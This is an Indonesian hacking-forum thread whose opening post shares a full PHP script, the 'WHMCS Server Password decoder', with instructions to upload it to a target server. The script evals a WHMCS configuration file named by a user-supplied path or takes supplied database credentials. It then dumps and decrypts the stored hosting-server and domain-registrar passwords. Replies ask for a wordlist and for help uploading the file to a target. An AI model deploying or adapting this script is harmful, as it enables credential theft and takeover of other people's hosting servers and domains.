Scan WHM with PHP

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Post Reply
User avatar
anharku
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Scan WHM with PHP

Post by anharku » Thu Apr 05, 2012 9:47 am

dapet dari forum sebelah gpp lah ane sebarin juga di xcode tercinta
  • <?php

    ###########################################
    # WHMCS Server Password decoder #
    # Coded By RAB3OUN #
    # [email protected] #
    #Note : I'm Proud to be ~~TUNISIAN~~ #
    ###########################################



    function decrypt ($string,$cc_encryption_hash)
    {

    $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
    $hash_key = _hash ($key);
    $hash_length = strlen ($hash_key);
    $string = base64_decode ($string);
    $tmp_iv = substr ($string, 0, $hash_length);
    $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
    $iv = $out = '';
    $c = 0;
    while ($c < $hash_length)
    {
    $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
    ++$c;
    }

    $key = $iv;
    $c = 0;
    while ($c < strlen ($string))
    {
    if (($c != 0 AND $c % $hash_length == 0))
    {
    $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
    }

    $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
    ++$c;
    }

    return $out;
    }


    function _hash ($string)
    {
    if (function_exists ('sha1'))
    {
    $hash = sha1 ($string);
    }
    else
    {
    $hash = md5 ($string);
    }

    $out = '';
    $c = 0;
    while ($c < strlen ($hash))
    {
    $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
    $c += 2;
    }

    return $out;
    }

    if($_POST['form_action'] == 1 )
    {
    //include($file);

    $file=($_POST['file']);
    $text=file_get_contents($file);

    $text= str_replace("<?php", "", $text);
    $text= str_replace("<?", "", $text);
    $text= str_replace("?>", "", $text);

    eval($text);

    $link=mysql_connect($db_host,$db_username,$db_pass word) ;
    mysql_select_db($db_name,$link) ;

    $query = mysql_query("SELECT * FROM tblservers");

    while($v = mysql_fetch_array($query)) {

    $ipaddress = $v['ipaddress'];
    $username = $v['username'];
    $type = $v['type'];
    $active = $v['active'];
    $hostname = $v['hostname'];

    echo("<center><table border='1'>");
    $password = decrypt ($v['password'], $cc_encryption_hash);
    echo("<tr><td>Type</td><td>$type</td></tr>");
    echo("<tr><td>Active</td><td>$active</td></tr>");
    echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
    echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
    echo("<tr><td>Username</td><td>$username</td></tr>");
    echo("<tr><td>Password</td><td>$password</td></tr>");


    echo "</table><br><br></center>";

    }

    $link=mysql_connect($db_host,$db_username,$db_pass word) ;
    mysql_select_db($db_name,$link) ;

    $query = mysql_query("SELECT * FROM tblregistrars");
    echo("<center>Domain Reseller <br><table border='1'>");
    echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
    while($v = mysql_fetch_array($query)) {

    $registrar = $v['registrar'];
    $setting = $v['setting'];
    $value = decrypt ($v['value'], $cc_encryption_hash);
    if ($value=="") {
    $value=0;
    }
    $password = decrypt ($v['password'], $cc_encryption_hash);
    echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");





    }
    echo "</table><br><br></center>";
    }



    if($_POST['form_action'] == 2 )
    {
    //include($file);

    $db_host=($_POST['db_host']);
    $db_username=($_POST['db_username']);
    $db_password=($_POST['db_password']);
    $db_name=($_POST['db_name']);
    $cc_encryption_hash=($_POST['cc_encryption_hash']);




    $link=mysql_connect($db_host,$db_username,$db_pass word) ;
    mysql_select_db($db_name,$link) ;

    $query = mysql_query("SELECT * FROM tblservers");

    while($v = mysql_fetch_array($query)) {

    $ipaddress = $v['ipaddress'];
    $username = $v['username'];
    $type = $v['type'];
    $active = $v['active'];
    $hostname = $v['hostname'];

    echo("<center><table border='1'>");
    $password = decrypt ($v['password'], $cc_encryption_hash);
    echo("<tr><td>Type</td><td>$type</td></tr>");
    echo("<tr><td>Active</td><td>$active</td></tr>");
    echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
    echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
    echo("<tr><td>Username</td><td>$username</td></tr>");
    echo("<tr><td>Password</td><td>$password</td></tr>");


    echo "</table><br><br></center>";

    }


    $link=mysql_connect($db_host,$db_username,$db_pass word) ;
    mysql_select_db($db_name,$link) ;

    $query = mysql_query("SELECT * FROM tblregistrars");
    echo("<center>Domain Reseller <br><table border='1'>");
    echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
    while($v = mysql_fetch_array($query)) {

    $registrar = $v['registrar'];
    $setting = $v['setting'];
    $value = decrypt ($v['value'], $cc_encryption_hash);
    if ($value=="") {
    $value=0;
    }
    $password = decrypt ($v['password'], $cc_encryption_hash);
    echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");





    }
    echo "</table><br><br></center>";
    }




    ?><body bgcolor="#000000">
    <style>

    BODY { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-ARROW-COLOR: olive; color: white;}
    textarea{background-color:#191919;color:red;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1px solid #666666;}
    input{FONT-WEIGHT:normal;background-color: #191919;font-size: 13px;font-weight:bold;color: red; font-family: Tahoma; border: 1px solid #666666;height:17}
    </style>
    <center>
    <font color="#FFFF6FF" size='+3'>[ ~~ WHMCS Server Password decoder ~~ ]</font><br><br>
    <font color="#0066FF" size='+2'>Symlink to configuration.php of WHMCS</font><br>
    </center>
    <FORM action="" method="post">
    <input type="hidden" name="form_action" value="1">
    <br>
    <input type="text" size="30" name="file" value="">
    <br>
    <INPUT class=submit type="submit" value="Submit" name="Submit">
    </FORM>
    <hr>

    <br>
    <center>
    <font color="#0066FF" size='+2'>DB configuration of WHMCS</font><br>
    </center>
    <FORM action="" method="post">
    <input type="hidden" name="form_action" value="2">
    <br>
    <table border=1>

    <tr><td>db_host </td><td><input type="text" size="30" name="db_host" value="localhost"></td></tr>
    <tr><td>db_username </td><td><input type="text" size="30" name="db_username" value=""></td></tr>
    <tr><td>db_password</td><td><input type="text" size="30" name="db_password" value=""></td></tr>
    <tr><td>db_name</td><td><input type="text" size="30" name="db_name" value=""><td></tr>
    <tr><td>cc_encryption_hash</td><td><input type="text" size="30" name="cc_encryption_hash" value=""></td></tr>

    </table>
    <br>
    <INPUT class=submit type="submit" value="Submit" name="Submit">
    </FORM>
    <hr>
    <center>
    <font color="#0066FF" size='+2'>Password decoder</font><br>
    <?
    if($_POST['form_action'] == 3 )
    {



    $password=($_POST['password']);

    $cc_encryption_hash=($_POST['cc_encryption_hash']);


    $password = decrypt ($password, $cc_encryption_hash);

    echo("Password is ".$password);

    }
    ?>
    </center>
    <FORM action="" method="post">
    <input type="hidden" name="form_action" value="3">
    <br>
    <table border=1>

    <tr><td>Password</td><td><input type="text" size="30" name="password" value=""></td></tr>
    <tr><td>cc_encryption_hash</td><td><input type="text" size="30" name="cc_encryption_hash" value=""></td></tr>

    </table>
    <br>
    <INPUT class=submit type="submit" value="Submit" name="Submit">
    </FORM>
    <hr>


    <center> <font color="#FFFF6FF" size='+1'> Coded By RAB3OUN [email protected] </font><br><br> <center>
simpan dengan nama whmcs.php upload di server TARGET lalu buka urlnya misal http://TARGET.COM/whmcs.php

Image
hasil:
Image
moga bermanfaat

User avatar
indounderground
Posts: 95
Joined: Thu Sep 07, 2006 6:14 am
Location: Somewhere underwear everywear :P
Contact:

Re: Scan WHM with PHP

Post by indounderground » Thu Apr 12, 2012 1:22 pm

wordlistnya mana om :)
sekalian dong

Kournikova
Posts: 7
Joined: Wed Sep 12, 2012 10:43 am
Location: Medan

Re: Scan WHM with PHP

Post by Kournikova » Wed Sep 12, 2012 11:52 am

waduh ilmu ane blm nyampe k'situ om :lol:
bsa ga tlngin di ksh POC nya om ?
pingin belajar juga nich

yoga_kelana
Posts: 214
Joined: Sat Dec 29, 2007 11:58 am
Location: Banjarmasin
Contact:

Re: Scan WHM with PHP

Post by yoga_kelana » Mon Dec 03, 2012 12:48 pm

ini di bruteforce ato gimana kang ?
ato cumaan buat login whm aja , jadi harus nyari config whm nya dulu donk :D
gua ko makin ganteng :D

m1ch43lss
Posts: 10
Joined: Wed Dec 23, 2009 1:34 am

Re: Scan WHM with PHP

Post by m1ch43lss » Mon Apr 01, 2013 12:37 am

cc encryption hash itu apa maksudnya?

edriajha
Posts: 4
Joined: Sat Dec 12, 2009 12:31 pm

Re: Scan WHM with PHP

Post by edriajha » Tue Jul 30, 2013 5:18 am

Gan, mau nanya nih cara upload file nya ke server target nya gmn gan..?

Post Reply

Return to “Web Hacking”